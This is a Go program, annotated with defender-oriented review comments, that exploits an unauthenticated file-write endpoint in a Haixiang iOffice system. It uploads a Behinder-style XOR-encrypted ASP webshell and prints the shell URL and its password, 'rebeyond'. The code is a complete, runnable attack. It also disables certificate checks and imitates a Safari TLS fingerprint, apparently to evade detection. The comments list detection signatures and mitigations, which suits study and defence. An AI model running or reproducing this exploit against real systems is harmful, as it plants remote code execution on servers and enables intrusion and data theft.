package main

import (
	"crypto/tls"
	"fmt"
	"github.com/hpifu/go-kit/hflag"
	"github.com/imroc/req/v3"
	"github.com/liushuochen/gotable"
	"github.com/thanhpk/randstr"
	"log"
	"net/http"
	"os"
	"strings"
	"time"
)

// main times one run of uploader against the address given with -target/-t
// and prints the elapsed time.
//
// NOTE(review): uploader returns nothing, so the closing message is printed
// on every path, including the ones where uploader logged an error or printed
// "GetShell Failed". The message is not evidence that a file was written.
func main() {
	start := time.Now()
	uploader(getParam())
	fmt.Printf("[√] 速度还是挺快的就这么点时间%s就GetShell了.", time.Since(start))
}

// getParam registers the required "target" flag (shorthand "t"; the help text
// reads "Haixiang address") and returns its value.
//
// When parsing fails the usage text is printed and the process exits.
// NOTE(review): the exit status on that path is 0, so a wrapping script cannot
// tell a usage error from a normal run.
func getParam() string {
	hflag.AddFlag("target", "海翔地址", hflag.Required(), hflag.Shorthand("t"))
	err := hflag.Parse()
	if err != nil {
		fmt.Println(hflag.Usage())
		os.Exit(0)
	}
	return hflag.GetString("target")
}

// reqClient builds the HTTP client used for both requests made by uploader.
//
// Security-relevant properties of the resulting client:
//   - Redirects are not followed, so the caller sees the first response as is.
//   - Certificate verification is disabled (InsecureSkipVerify), so the peer
//     is never authenticated and any certificate is accepted.
//   - TLS versions 1.0 through 1.3 are accepted.
//   - SetTLSFingerprintSafari is applied. Presumably this shapes the TLS
//     ClientHello to resemble Safari's; if so, detections keyed on the default
//     Go TLS fingerprint will not match this traffic, and the request path and
//     query string are the more dependable signals. Confirm against the req
//     version in use.
func reqClient() *req.Client {
	c := req.C()
	c.SetAutoDecodeAllContentType()
	c.SetRedirectPolicy(req.NoRedirectPolicy())
	c.SetTimeout(15 * time.Second)
	c.SetTLSFingerprintSafari()

	// Assigned after the fingerprint call, in the same order as before.
	// NOTE(review): how this assignment interacts with the fingerprint
	// setting is not visible here.
	tlsCfg := &tls.Config{
		InsecureSkipVerify: true,
		MinVersion:         tls.VersionTLS10,
		MaxVersion:         tls.VersionTLS13,
	}
	c.TLSClientConfig = tlsCfg
	return c
}

// uploader sends one POST that asks the report-save endpoint to write a file,
// then one GET for the path where that file would be served, and prints a
// result table unless the GET returns 404.
//
// What the code shows, from a defender's point of view:
//   - The POST goes to /ioffice/prg/set/report/iorepsavexml.aspx with the query
//     parameters key=writefile, filename=<name> and filepath=/upfiles/rep/pic/.
//     No cookie, token or credential is attached anywhere in this file, so the
//     tool assumes the endpoint accepts the write unauthenticated.
//   - The request body is a classic ASP script, so the end state being tested
//     is a server-executable file inside a web-served upload directory.
//
// Detection points visible here: requests to iorepsavexml.aspx carrying
// key=writefile; a filename parameter ending in .asp; new .asp files under
// /ioffice/upfiles/rep/pic/; and the fixed key string inside the file body.
// Mitigations that follow directly: require authentication on that endpoint,
// restrict the filename extension and filepath server-side, and disable script
// execution in the upload directory.
//
// target is used as the URL prefix without validation; the only normalisation
// is collapsing the first "//io" into "/io" (a trailing slash on target).
func uploader(target string) {
	// Random hex name with an .asp extension (presumably 16 hex characters for
	// Hex(8) — confirm against the randstr version in use).
	shellName := randstr.Hex(8) + ".asp"
	// Classic ASP body: stores a fixed 16-character key in the session, reads the
	// raw request body, XORs each byte with the key, and passes the result to
	// execute(). The key is a constant, so it is a usable static signature when
	// scanning upload directories or request bodies.
	shellString := "<%\nResponse.CharSet = \"UTF-8\" \nk=\"e45e329feb5d925b\" \nSession(\"k\")=k\nsize=Request.TotalBytes\ncontent=Request.BinaryRead(size)\nFor i=1 To size\nresult=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))\nNext\nexecute(result)\n%>\n"
	// Write request: the file name and destination directory are both supplied by
	// the client in the query string.
	vulUrl := strings.Replace(target+"/ioffice/prg/set/report/iorepsavexml.aspx?key=writefile&filename="+shellName+"&filepath=/upfiles/rep/pic/", "//io", "/io", 1)
	client := reqClient()
	post, err := client.R().SetBody(shellString).Post(vulUrl)
	if err != nil {
		log.Println(err)
		return
	}
	defer func() {
		_ = post.Body.Close()
	}()
	// Only the status code is checked; the response body is never inspected.
	if post.StatusCode != http.StatusOK {
		fmt.Println("GetShell Failed")
		return
	}
	// Path where the written file would be reachable over HTTP.
	shellURL := strings.Replace(target+"/ioffice/upfiles/rep/pic/"+shellName, "//io", "/io", 1)
	// NOTE(review): the error is discarded. If the request fails, reading
	// get.StatusCode or get.Body below may dereference a nil response — confirm
	// against the req version in use.
	get, _ := client.R().Get(shellURL)
	// Any status other than 404 is reported as a finding. A 403 or 500 also
	// lands here, so the table is an indication, not confirmation, that the file
	// exists or is executable.
	if get.StatusCode != http.StatusNotFound {
		// Column headers read "Shell connection tool", "Shell connection address"
		// and "Shell connection password"; the row names the client tool, the URL
		// and the password string "rebeyond". Errors from the table library are
		// ignored.
		create, _ := gotable.Create("Shell连接工具", "Shell连接地址", "Shell连接密码")
		_ = create.AddRow([]string{
			"冰蝎", shellURL, "rebeyond",
		})
		fmt.Println(create)
	}
	// Registered last, so it runs first at return. Nothing in this function
	// removes the uploaded file, so a successful run leaves it on the target
	// until it is deleted there.
	defer func() {
		_ = get.Body.Close()
	}()
}
